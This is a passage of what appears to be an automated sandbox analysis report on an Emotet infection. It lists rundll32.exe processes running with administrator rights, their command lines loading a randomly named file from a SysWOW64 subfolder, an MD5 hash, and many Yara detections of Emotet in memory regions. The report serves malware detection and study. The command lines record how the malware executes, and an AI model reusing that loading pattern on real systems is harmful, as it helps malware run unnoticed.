                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:16
                                    Start time:21:15:25
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                    General

                                    Target ID:17
                                    Start time:21:15:30
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security

                                    Disassembly

                                    No disassembly